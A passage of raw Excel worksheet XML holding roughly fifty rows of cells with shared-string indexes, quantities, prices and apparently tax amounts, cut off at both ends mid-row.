      <c r="D1608" s="238" t="s">
        <v>9097</v>
      </c>
      <c r="E1608" s="238" t="s">
        <v>8730</v>
      </c>
      <c r="F1608" s="238" t="s">
        <v>9098</v>
      </c>
      <c r="G1608" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1608" s="10">
        <v>3</v>
      </c>
      <c r="I1608" s="14">
        <v>1230.77</v>
      </c>
      <c r="J1608" s="15">
        <v>196.9248</v>
      </c>
      <c r="K1608" s="16"/>
    </row>
    <row r="1609" spans="2:11">
      <c r="B1609" s="9">
        <v>1643</v>
      </c>
      <c r="C1609" s="238" t="s">
        <v>9099</v>
      </c>
      <c r="D1609" s="238" t="s">
        <v>9100</v>
      </c>
      <c r="E1609" s="238" t="s">
        <v>8783</v>
      </c>
      <c r="F1609" s="238" t="s">
        <v>9101</v>
      </c>
      <c r="G1609" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1609" s="10">
        <v>3</v>
      </c>
      <c r="I1609" s="14">
        <v>1230.77</v>
      </c>
      <c r="J1609" s="15">
        <v>196.9248</v>
      </c>
      <c r="K1609" s="16"/>
    </row>
    <row r="1610" spans="2:11">
      <c r="B1610" s="9">
        <v>1644</v>
      </c>
      <c r="C1610" s="238" t="s">
        <v>9102</v>
      </c>
      <c r="D1610" s="238" t="s">
        <v>7226</v>
      </c>
      <c r="E1610" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1610" s="9"/>
      <c r="G1610" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1610" s="10">
        <v>16</v>
      </c>
      <c r="I1610" s="14">
        <v>624.19</v>
      </c>
      <c r="J1610" s="15">
        <v>99.8656</v>
      </c>
      <c r="K1610" s="16"/>
    </row>
    <row r="1611" spans="2:11">
      <c r="B1611" s="9">
        <v>1645</v>
      </c>
      <c r="C1611" s="238" t="s">
        <v>9103</v>
      </c>
      <c r="D1611" s="238" t="s">
        <v>9104</v>
      </c>
      <c r="E1611" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F1611" s="238" t="s">
        <v>9105</v>
      </c>
      <c r="G1611" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1611" s="10">
        <v>25</v>
      </c>
      <c r="I1611" s="14">
        <v>1514.53</v>
      </c>
      <c r="J1611" s="15">
        <v>242.32</v>
      </c>
      <c r="K1611" s="16"/>
    </row>
    <row r="1612" spans="2:11">
      <c r="B1612" s="9">
        <v>1646</v>
      </c>
      <c r="C1612" s="238" t="s">
        <v>9106</v>
      </c>
      <c r="D1612" s="238" t="s">
        <v>9107</v>
      </c>
      <c r="E1612" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F1612" s="238" t="s">
        <v>9108</v>
      </c>
      <c r="G1612" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1612" s="10">
        <v>40</v>
      </c>
      <c r="I1612" s="14">
        <v>652.15</v>
      </c>
      <c r="J1612" s="15">
        <v>104.32</v>
      </c>
      <c r="K1612" s="16"/>
    </row>
    <row r="1613" spans="2:11">
      <c r="B1613" s="9">
        <v>1647</v>
      </c>
      <c r="C1613" s="238" t="s">
        <v>9109</v>
      </c>
      <c r="D1613" s="238" t="s">
        <v>9110</v>
      </c>
      <c r="E1613" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F1613" s="238" t="s">
        <v>9111</v>
      </c>
      <c r="G1613" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1613" s="10">
        <v>12</v>
      </c>
      <c r="I1613" s="14">
        <v>615.38</v>
      </c>
      <c r="J1613" s="15">
        <v>98.4576</v>
      </c>
      <c r="K1613" s="16"/>
    </row>
    <row r="1614" spans="2:11">
      <c r="B1614" s="9">
        <v>1648</v>
      </c>
      <c r="C1614" s="238" t="s">
        <v>9112</v>
      </c>
      <c r="D1614" s="238" t="s">
        <v>9113</v>
      </c>
      <c r="E1614" s="238" t="s">
        <v>9114</v>
      </c>
      <c r="F1614" s="238" t="s">
        <v>411</v>
      </c>
      <c r="G1614" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1614" s="10">
        <v>1</v>
      </c>
      <c r="I1614" s="14">
        <v>350.42</v>
      </c>
      <c r="J1614" s="15">
        <v>56.0672</v>
      </c>
      <c r="K1614" s="16"/>
    </row>
    <row r="1615" spans="2:11">
      <c r="B1615" s="9">
        <v>1649</v>
      </c>
      <c r="C1615" s="238" t="s">
        <v>9115</v>
      </c>
      <c r="D1615" s="238" t="s">
        <v>9116</v>
      </c>
      <c r="E1615" s="238" t="s">
        <v>867</v>
      </c>
      <c r="F1615" s="238" t="s">
        <v>9117</v>
      </c>
      <c r="G1615" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1615" s="10">
        <v>2</v>
      </c>
      <c r="I1615" s="14">
        <v>4358.98</v>
      </c>
      <c r="J1615" s="15">
        <v>697.4368</v>
      </c>
      <c r="K1615" s="16"/>
    </row>
    <row r="1616" spans="2:11">
      <c r="B1616" s="9">
        <v>1650</v>
      </c>
      <c r="C1616" s="238" t="s">
        <v>9118</v>
      </c>
      <c r="D1616" s="238" t="s">
        <v>9119</v>
      </c>
      <c r="E1616" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1616" s="238" t="s">
        <v>9120</v>
      </c>
      <c r="G1616" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1616" s="10">
        <v>3</v>
      </c>
      <c r="I1616" s="14">
        <v>13333.33</v>
      </c>
      <c r="J1616" s="15">
        <v>2133.3312</v>
      </c>
      <c r="K1616" s="16"/>
    </row>
    <row r="1617" spans="2:11">
      <c r="B1617" s="9">
        <v>1651</v>
      </c>
      <c r="C1617" s="238" t="s">
        <v>9121</v>
      </c>
      <c r="D1617" s="238" t="s">
        <v>9122</v>
      </c>
      <c r="E1617" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F1617" s="238" t="s">
        <v>9123</v>
      </c>
      <c r="G1617" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1617" s="10">
        <v>3</v>
      </c>
      <c r="I1617" s="14">
        <v>1719.09</v>
      </c>
      <c r="J1617" s="15">
        <v>275.0544</v>
      </c>
      <c r="K1617" s="16"/>
    </row>
    <row r="1618" spans="2:11">
      <c r="B1618" s="9">
        <v>1652</v>
      </c>
      <c r="C1618" s="238" t="s">
        <v>9124</v>
      </c>
      <c r="D1618" s="238" t="s">
        <v>9125</v>
      </c>
      <c r="E1618" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F1618" s="238" t="s">
        <v>9126</v>
      </c>
      <c r="G1618" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1618" s="10">
        <v>3</v>
      </c>
      <c r="I1618" s="14">
        <v>1064.66</v>
      </c>
      <c r="J1618" s="15">
        <v>170.3472</v>
      </c>
      <c r="K1618" s="16"/>
    </row>
    <row r="1619" spans="2:11">
      <c r="B1619" s="9">
        <v>1653</v>
      </c>
      <c r="C1619" s="238" t="s">
        <v>9127</v>
      </c>
      <c r="D1619" s="238" t="s">
        <v>9128</v>
      </c>
      <c r="E1619" s="238" t="s">
        <v>9129</v>
      </c>
      <c r="F1619" s="238" t="s">
        <v>9130</v>
      </c>
      <c r="G1619" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1619" s="10">
        <v>10</v>
      </c>
      <c r="I1619" s="14">
        <v>726.5</v>
      </c>
      <c r="J1619" s="15">
        <v>116.24</v>
      </c>
      <c r="K1619" s="16"/>
    </row>
    <row r="1620" spans="2:11">
      <c r="B1620" s="9">
        <v>1654</v>
      </c>
      <c r="C1620" s="238" t="s">
        <v>9131</v>
      </c>
      <c r="D1620" s="238" t="s">
        <v>9132</v>
      </c>
      <c r="E1620" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1620" s="238" t="s">
        <v>9133</v>
      </c>
      <c r="G1620" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1620" s="10">
        <v>5</v>
      </c>
      <c r="I1620" s="14">
        <v>17151</v>
      </c>
      <c r="J1620" s="15">
        <v>2744.16</v>
      </c>
      <c r="K1620" s="16"/>
    </row>
    <row r="1621" spans="2:11">
      <c r="B1621" s="9">
        <v>1655</v>
      </c>
      <c r="C1621" s="238" t="s">
        <v>9134</v>
      </c>
      <c r="D1621" s="238" t="s">
        <v>9135</v>
      </c>
      <c r="E1621" s="238" t="s">
        <v>8570</v>
      </c>
      <c r="F1621" s="238" t="s">
        <v>9136</v>
      </c>
      <c r="G1621" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1621" s="10">
        <v>35</v>
      </c>
      <c r="I1621" s="14">
        <v>1794.93</v>
      </c>
      <c r="J1621" s="15">
        <v>287.168</v>
      </c>
      <c r="K1621" s="16"/>
    </row>
    <row r="1622" spans="2:11">
      <c r="B1622" s="9">
        <v>1656</v>
      </c>
      <c r="C1622" s="238" t="s">
        <v>9137</v>
      </c>
      <c r="D1622" s="238" t="s">
        <v>9138</v>
      </c>
      <c r="E1622" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1622" s="238" t="s">
        <v>9139</v>
      </c>
      <c r="G1622" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1622" s="10">
        <v>10</v>
      </c>
      <c r="I1622" s="14">
        <v>940.17</v>
      </c>
      <c r="J1622" s="15">
        <v>150.432</v>
      </c>
      <c r="K1622" s="16"/>
    </row>
    <row r="1623" spans="2:11">
      <c r="B1623" s="9">
        <v>1657</v>
      </c>
      <c r="C1623" s="238" t="s">
        <v>9140</v>
      </c>
      <c r="D1623" s="238" t="s">
        <v>9141</v>
      </c>
      <c r="E1623" s="238" t="s">
        <v>8655</v>
      </c>
      <c r="F1623" s="238" t="s">
        <v>9142</v>
      </c>
      <c r="G1623" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1623" s="10">
        <v>8</v>
      </c>
      <c r="I1623" s="14">
        <v>512.88</v>
      </c>
      <c r="J1623" s="15">
        <v>82.0608</v>
      </c>
      <c r="K1623" s="16"/>
    </row>
    <row r="1624" spans="2:11">
      <c r="B1624" s="9">
        <v>1658</v>
      </c>
      <c r="C1624" s="238" t="s">
        <v>9143</v>
      </c>
      <c r="D1624" s="238" t="s">
        <v>9144</v>
      </c>
      <c r="E1624" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1624" s="238" t="s">
        <v>9145</v>
      </c>
      <c r="G1624" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1624" s="10">
        <v>28</v>
      </c>
      <c r="I1624" s="14">
        <v>3470.14</v>
      </c>
      <c r="J1624" s="15">
        <v>555.2064</v>
      </c>
      <c r="K1624" s="16"/>
    </row>
    <row r="1625" spans="2:11">
      <c r="B1625" s="9">
        <v>1659</v>
      </c>
      <c r="C1625" s="238" t="s">
        <v>9146</v>
      </c>
      <c r="D1625" s="238" t="s">
        <v>9147</v>
      </c>
      <c r="E1625" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1625" s="238" t="s">
        <v>9148</v>
      </c>
      <c r="G1625" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1625" s="10">
        <v>153</v>
      </c>
      <c r="I1625" s="14">
        <v>5230.39</v>
      </c>
      <c r="J1625" s="15">
        <v>836.9712</v>
      </c>
      <c r="K1625" s="16"/>
    </row>
    <row r="1626" spans="2:11">
      <c r="B1626" s="9">
        <v>1660</v>
      </c>
      <c r="C1626" s="238" t="s">
        <v>9149</v>
      </c>
      <c r="D1626" s="238" t="s">
        <v>9150</v>
      </c>
      <c r="E1626" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1626" s="238" t="s">
        <v>9151</v>
      </c>
      <c r="G1626" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1626" s="10">
        <v>22</v>
      </c>
      <c r="I1626" s="14">
        <v>1107.69</v>
      </c>
      <c r="J1626" s="15">
        <v>443.08</v>
      </c>
      <c r="K1626" s="16"/>
    </row>
    <row r="1627" spans="2:11">
      <c r="B1627" s="9">
        <v>1661</v>
      </c>
      <c r="C1627" s="238" t="s">
        <v>9152</v>
      </c>
      <c r="D1627" s="238" t="s">
        <v>6968</v>
      </c>
      <c r="E1627" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1627" s="238" t="s">
        <v>6276</v>
      </c>
      <c r="G1627" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1627" s="10">
        <v>12</v>
      </c>
      <c r="I1627" s="14">
        <v>235.87</v>
      </c>
      <c r="J1627" s="15">
        <v>94.368</v>
      </c>
      <c r="K1627" s="16"/>
    </row>
    <row r="1628" spans="2:11">
      <c r="B1628" s="9">
        <v>1662</v>
      </c>
      <c r="C1628" s="238" t="s">
        <v>9153</v>
      </c>
      <c r="D1628" s="238" t="s">
        <v>9154</v>
      </c>
      <c r="E1628" s="238" t="s">
        <v>9155</v>
      </c>
      <c r="F1628" s="238" t="s">
        <v>9156</v>
      </c>
      <c r="G1628" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1628" s="10">
        <v>3</v>
      </c>
      <c r="I1628" s="14">
        <v>138.46</v>
      </c>
      <c r="J1628" s="15">
        <v>22.152</v>
      </c>
      <c r="K1628" s="16"/>
    </row>
    <row r="1629" spans="2:11">
      <c r="B1629" s="9">
        <v>1663</v>
      </c>
      <c r="C1629" s="238" t="s">
        <v>9157</v>
      </c>
      <c r="D1629" s="238" t="s">
        <v>9158</v>
      </c>
      <c r="E1629" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1629" s="238" t="s">
        <v>9159</v>
      </c>
      <c r="G1629" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1629" s="10">
        <v>6</v>
      </c>
      <c r="I1629" s="14">
        <v>194.87</v>
      </c>
      <c r="J1629" s="15">
        <v>31.1808</v>
      </c>
      <c r="K1629" s="16"/>
    </row>
    <row r="1630" spans="2:11">
      <c r="B1630" s="9">
        <v>1664</v>
      </c>
      <c r="C1630" s="238" t="s">
        <v>9160</v>
      </c>
      <c r="D1630" s="238" t="s">
        <v>9161</v>
      </c>
      <c r="E1630" s="238" t="s">
        <v>9162</v>
      </c>
      <c r="F1630" s="238" t="s">
        <v>9163</v>
      </c>
      <c r="G1630" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1630" s="10">
        <v>3</v>
      </c>
      <c r="I1630" s="14">
        <v>972.72</v>
      </c>
      <c r="J1630" s="15">
        <v>155.6352</v>
      </c>
      <c r="K1630" s="16"/>
    </row>
    <row r="1631" spans="2:11">
      <c r="B1631" s="9">
        <v>1665</v>
      </c>
      <c r="C1631" s="238" t="s">
        <v>9164</v>
      </c>
      <c r="D1631" s="238" t="s">
        <v>9165</v>
      </c>
      <c r="E1631" s="238" t="s">
        <v>9166</v>
      </c>
      <c r="F1631" s="238" t="s">
        <v>9167</v>
      </c>
      <c r="G1631" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1631" s="10">
        <v>4</v>
      </c>
      <c r="I1631" s="14">
        <v>5470.09</v>
      </c>
      <c r="J1631" s="15">
        <v>875.2128</v>
      </c>
      <c r="K1631" s="16"/>
    </row>
    <row r="1632" spans="2:11">
      <c r="B1632" s="9">
        <v>1666</v>
      </c>
      <c r="C1632" s="238" t="s">
        <v>9168</v>
      </c>
      <c r="D1632" s="238" t="s">
        <v>9169</v>
      </c>
      <c r="E1632" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F1632" s="238" t="s">
        <v>9170</v>
      </c>
      <c r="G1632" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1632" s="10">
        <v>1</v>
      </c>
      <c r="I1632" s="14">
        <v>4444.44</v>
      </c>
      <c r="J1632" s="15">
        <v>711.1104</v>
      </c>
      <c r="K1632" s="16"/>
    </row>
    <row r="1633" spans="2:11">
      <c r="B1633" s="9">
        <v>1667</v>
      </c>
      <c r="C1633" s="238" t="s">
        <v>9171</v>
      </c>
      <c r="D1633" s="238" t="s">
        <v>9172</v>
      </c>
      <c r="E1633" s="238" t="s">
        <v>8459</v>
      </c>
      <c r="F1633" s="238" t="s">
        <v>9173</v>
      </c>
      <c r="G1633" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1633" s="10">
        <v>2</v>
      </c>
      <c r="I1633" s="14">
        <v>615.39</v>
      </c>
      <c r="J1633" s="15">
        <v>98.464</v>
      </c>
      <c r="K1633" s="16"/>
    </row>
    <row r="1634" spans="2:11">
      <c r="B1634" s="9">
        <v>1668</v>
      </c>
      <c r="C1634" s="238" t="s">
        <v>9174</v>
      </c>
      <c r="D1634" s="238" t="s">
        <v>9175</v>
      </c>
      <c r="E1634" s="238" t="s">
        <v>9176</v>
      </c>
      <c r="F1634" s="238" t="s">
        <v>9163</v>
      </c>
      <c r="G1634" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1634" s="10">
        <v>3</v>
      </c>
      <c r="I1634" s="14">
        <v>4615.38</v>
      </c>
      <c r="J1634" s="15">
        <v>738.4608</v>
      </c>
      <c r="K1634" s="16"/>
    </row>
    <row r="1635" spans="2:11">
      <c r="B1635" s="9">
        <v>1669</v>
      </c>
      <c r="C1635" s="238" t="s">
        <v>9177</v>
      </c>
      <c r="D1635" s="238" t="s">
        <v>5127</v>
      </c>
      <c r="E1635" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1635" s="238" t="s">
        <v>9178</v>
      </c>
      <c r="G1635" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1635" s="10">
        <v>1</v>
      </c>
      <c r="I1635" s="14">
        <v>2997.15</v>
      </c>
      <c r="J1635" s="15">
        <v>479.544</v>
      </c>
      <c r="K1635" s="16"/>
    </row>
    <row r="1636" spans="2:11">
      <c r="B1636" s="9">
        <v>1670</v>
      </c>
      <c r="C1636" s="238" t="s">
        <v>9179</v>
      </c>
      <c r="D1636" s="238" t="s">
        <v>9180</v>
      </c>
      <c r="E1636" s="238" t="s">
        <v>9067</v>
      </c>
      <c r="F1636" s="238" t="s">
        <v>9181</v>
      </c>
      <c r="G1636" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1636" s="10">
        <v>3</v>
      </c>
      <c r="I1636" s="14">
        <v>1307.69</v>
      </c>
      <c r="J1636" s="15">
        <v>209.232</v>
      </c>
      <c r="K1636" s="16"/>
    </row>
    <row r="1637" spans="2:11">
      <c r="B1637" s="9">
        <v>1671</v>
      </c>
      <c r="C1637" s="238" t="s">
        <v>9182</v>
      </c>
      <c r="D1637" s="238" t="s">
        <v>9183</v>
      </c>
      <c r="E1637" s="238" t="s">
        <v>8470</v>
      </c>
      <c r="F1637" s="238" t="s">
        <v>9184</v>
      </c>
      <c r="G1637" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1637" s="10">
        <v>2</v>
      </c>
      <c r="I1637" s="14">
        <v>2051.28</v>
      </c>
      <c r="J1637" s="15">
        <v>328.2048</v>
      </c>
      <c r="K1637" s="16"/>
    </row>
    <row r="1638" spans="2:11">
      <c r="B1638" s="9">
        <v>1672</v>
      </c>
      <c r="C1638" s="238" t="s">
        <v>9185</v>
      </c>
      <c r="D1638" s="238" t="s">
        <v>9186</v>
      </c>
      <c r="E1638" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F1638" s="238" t="s">
        <v>9187</v>
      </c>
      <c r="G1638" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1638" s="10">
        <v>80</v>
      </c>
      <c r="I1638" s="14">
        <v>2735</v>
      </c>
      <c r="J1638" s="15">
        <v>437.632</v>
      </c>
      <c r="K1638" s="16"/>
    </row>
    <row r="1639" spans="2:11">
      <c r="B1639" s="9">
        <v>1673</v>
      </c>
      <c r="C1639" s="238" t="s">
        <v>9188</v>
      </c>
      <c r="D1639" s="238" t="s">
        <v>9189</v>
      </c>
      <c r="E1639" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1639" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1639" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1639" s="10">
        <v>1</v>
      </c>
      <c r="I1639" s="14">
        <v>192.82</v>
      </c>
      <c r="J1639" s="15">
        <v>30.8512</v>
      </c>
      <c r="K1639" s="16"/>
    </row>
    <row r="1640" spans="2:11">
      <c r="B1640" s="9">
        <v>1674</v>
      </c>
      <c r="C1640" s="238" t="s">
        <v>9191</v>
      </c>
      <c r="D1640" s="238" t="s">
        <v>9192</v>
      </c>
      <c r="E1640" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1640" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1640" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1640" s="10">
        <v>1</v>
      </c>
      <c r="I1640" s="14">
        <v>256.41</v>
      </c>
      <c r="J1640" s="15">
        <v>41.0256</v>
      </c>
      <c r="K1640" s="16"/>
    </row>
    <row r="1641" spans="2:11">
      <c r="B1641" s="9">
        <v>1675</v>
      </c>
      <c r="C1641" s="238" t="s">
        <v>9193</v>
      </c>
      <c r="D1641" s="238" t="s">
        <v>9194</v>
      </c>
      <c r="E1641" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1641" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1641" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1641" s="10">
        <v>5</v>
      </c>
      <c r="I1641" s="14">
        <v>256.41</v>
      </c>
      <c r="J1641" s="15">
        <v>41.024</v>
      </c>
      <c r="K1641" s="16"/>
    </row>
    <row r="1642" spans="2:11">
      <c r="B1642" s="9">
        <v>1676</v>
      </c>
      <c r="C1642" s="238" t="s">
        <v>9195</v>
      </c>
      <c r="D1642" s="238" t="s">
        <v>9196</v>
      </c>
      <c r="E1642" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F1642" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1642" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1642" s="10">
        <v>3</v>
      </c>
      <c r="I1642" s="14">
        <v>805.13</v>
      </c>
      <c r="J1642" s="15">
        <v>128.8224</v>
      </c>
      <c r="K1642" s="16"/>
    </row>
    <row r="1643" spans="2:11">
      <c r="B1643" s="9">
        <v>1677</v>
      </c>
      <c r="C1643" s="238" t="s">
        <v>9197</v>
      </c>
      <c r="D1643" s="238" t="s">
        <v>9198</v>
      </c>
      <c r="E1643" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1643" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1643" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1643" s="10">
        <v>2</v>
      </c>
      <c r="I1643" s="14">
        <v>1755.85</v>
      </c>
      <c r="J1643" s="15">
        <v>280.9376</v>
      </c>
      <c r="K1643" s="16"/>
    </row>
    <row r="1644" spans="2:11">
      <c r="B1644" s="9">
        <v>1678</v>
      </c>
      <c r="C1644" s="238" t="s">
        <v>9199</v>
      </c>
      <c r="D1644" s="238" t="s">
        <v>9200</v>
      </c>
      <c r="E1644" s="238" t="s">
        <v>8599</v>
      </c>
      <c r="F1644" s="238" t="s">
        <v>9190</v>
      </c>
      <c r="G1644" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1644" s="10">
        <v>12</v>
      </c>
      <c r="I1644" s="14">
        <v>1049.56</v>
      </c>
      <c r="J1644" s="15">
        <v>167.9232</v>
      </c>
      <c r="K1644" s="16"/>
    </row>
    <row r="1645" spans="2:11">
      <c r="B1645" s="9">
        <v>1679</v>
      </c>
      <c r="C1645" s="238" t="s">
        <v>9201</v>
      </c>
      <c r="D1645" s="238" t="s">
        <v>8561</v>
      </c>
      <c r="E1645" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1645" s="238" t="s">
        <v>9202</v>
      </c>
      <c r="G1645" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1645" s="10">
        <v>21</v>
      </c>
      <c r="I1645" s="14">
        <v>4738.46</v>
      </c>
      <c r="J1645" s="15">
        <v>758.1504</v>
      </c>
      <c r="K1645" s="16"/>
    </row>
    <row r="1646" spans="2:11">
      <c r="B1646" s="9">
        <v>1680</v>
      </c>
      <c r="C1646" s="238" t="s">
        <v>9203</v>
      </c>
      <c r="D1646" s="238" t="s">
        <v>9204</v>
      </c>
      <c r="E1646" s="238" t="s">
        <v>9205</v>
      </c>
      <c r="F1646" s="238" t="s">
        <v>9206</v>
      </c>
      <c r="G1646" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1646" s="10">
        <v>6</v>
      </c>
      <c r="I1646" s="14">
        <v>2411.61</v>
      </c>
      <c r="J1646" s="15">
        <v>385.8624</v>
      </c>
      <c r="K1646" s="16"/>
    </row>
    <row r="1647" spans="2:11">
      <c r="B1647" s="9">
        <v>1681</v>
      </c>
      <c r="C1647" s="238" t="s">
        <v>9207</v>
      </c>
      <c r="D1647" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1647" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1647" s="238" t="s">
        <v>9208</v>
      </c>
      <c r="G1647" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1647" s="10">
        <v>66</v>
      </c>
      <c r="I1647" s="14">
        <v>83.93</v>
      </c>
      <c r="J1647" s="15">
        <v>13.4112</v>
      </c>
      <c r="K1647" s="16"/>
    </row>
    <row r="1648" spans="2:11">
      <c r="B1648" s="9">
        <v>1682</v>
      </c>
      <c r="C1648" s="238" t="s">
        <v>9209</v>
      </c>
      <c r="D1648" s="238" t="s">
        <v>9210</v>
      </c>
      <c r="E1648" s="238" t="s">
        <v>5370</v>
      </c>
      <c r="F1648" s="238" t="s">
        <v>9211</v>
      </c>
      <c r="G1648" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1648" s="10">
        <v>8</v>
      </c>
      <c r="I1648" s="14">
        <v>1026.32</v>
      </c>
      <c r="J1648" s="15">
        <v>164.2112</v>
      </c>
      <c r="K1648" s="16"/>
    </row>
    <row r="1649" spans="2:11">
      <c r="B1649" s="9">
        <v>1683</v>
      </c>
      <c r="C1649" s="238" t="s">
        <v>9212</v>
      </c>
      <c r="D1649" s="238" t="s">
        <v>9213</v>
      </c>
      <c r="E1649" s="238" t="s">
        <v>9214</v>
      </c>
      <c r="F1649" s="238" t="s">
        <v>9215</v>
      </c>
      <c r="G1649" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1649" s="10">
        <v>150</v>
      </c>
      <c r="I1649" s="14">
        <v>1923.08</v>
      </c>
      <c r="J1649" s="15">
        <v>307.68</v>
      </c>
      <c r="K1649" s="16"/>
    </row>
    <row r="1650" spans="2:11">
      <c r="B1650" s="9">
        <v>1684</v>
      </c>
      <c r="C1650" s="238" t="s">
        <v>9216</v>
      </c>
      <c r="D1650" s="238" t="s">
        <v>9217</v>
      </c>
      <c r="E1650" s="238" t="s">
        <v>9155</v>
      </c>
      <c r="F1650" s="238" t="s">
        <v>9218</v>
      </c>
      <c r="G1650" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1650" s="10">
        <v>58</v>
      </c>
      <c r="I1650" s="14">
        <v>219.31</v>
      </c>
      <c r="J1650" s="15">
        <v>35.0784</v>
      </c>
      <c r="K1650" s="16"/>
    </row>
    <row r="1651" spans="2:11">
      <c r="B1651" s="9">
        <v>1685</v>
      </c>
      <c r="C1651" s="238" t="s">
        <v>9219</v>
      </c>
      <c r="D1651" s="238" t="s">
        <v>9220</v>
      </c>
      <c r="E1651" s="238" t="s">
        <v>9221</v>
      </c>
      <c r="F1651" s="238" t="s">
        <v>9222</v>
      </c>
      <c r="G1651" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1651" s="10">
        <v>37</v>
      </c>
      <c r="I1651" s="14">
        <v>748.72</v>
      </c>
      <c r="J1651" s="15">
        <v>119.8208</v>
      </c>
      <c r="K1651" s="16"/>
    </row>
    <row r="1652" spans="2:11">
      <c r="B1652" s="9">
        <v>1686</v>
      </c>
      <c r="C1652" s="238" t="s">
        <v>9223</v>
      </c>
      <c r="D1652" s="238" t="s">
        <v>9224</v>
      </c>
      <c r="E1652" s="238" t="s">
        <v>8455</v>
      </c>
      <c r="F1652" s="238" t="s">
        <v>9225</v>
      </c>
      <c r="G1652" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1652" s="10">
        <v>7</v>
      </c>
      <c r="I1652" s="14">
        <v>773.08</v>
      </c>
      <c r="J1652" s="15">
        <v>123.6928</v>
      </c>
      <c r="K1652" s="16"/>
    </row>
    <row r="1653" spans="2:11">
      <c r="B1653" s="9">
        <v>1687</v>
      </c>
      <c r="C1653" s="238" t="s">
        <v>9226</v>
      </c>
      <c r="D1653" s="238" t="s">
        <v>9227</v>
      </c>
      <c r="E1653" s="238" t="s">
        <v>5350</v>
      </c>
      <c r="F1653" s="238" t="s">
        <v>9228</v>
      </c>
      <c r="G1653" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1653" s="10">
        <v>7</v>
      </c>
      <c r="I1653" s="14">
        <v>716.54</v>
      </c>
      <c r="J1653" s="15">
        <v>114.6432</v>
      </c>
      <c r="K1653" s="16"/>
    </row>
    <row r="1654" spans="2:11">
      <c r="B1654" s="9">
        <v>1688</v>
      </c>
      <c r="C1654" s="238" t="s">
        <v>9229</v>
      </c>
      <c r="D1654" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E1654" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F1654" s="238" t="s">
        <v>9230</v>
      </c>
      <c r="G1654" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1654" s="10">
        <v>3</v>
      </c>
      <c r="I1654" s="14">
        <v>243.59</v>
      </c>
      <c r="J1654" s="15">
        <v>38.976</v>
      </c>
      <c r="K1654" s="16"/>
    </row>
    <row r="1655" spans="2:11">
      <c r="B1655" s="9">
        <v>1689</v>
      </c>
      <c r="C1655" s="238" t="s">
        <v>9231</v>
      </c>
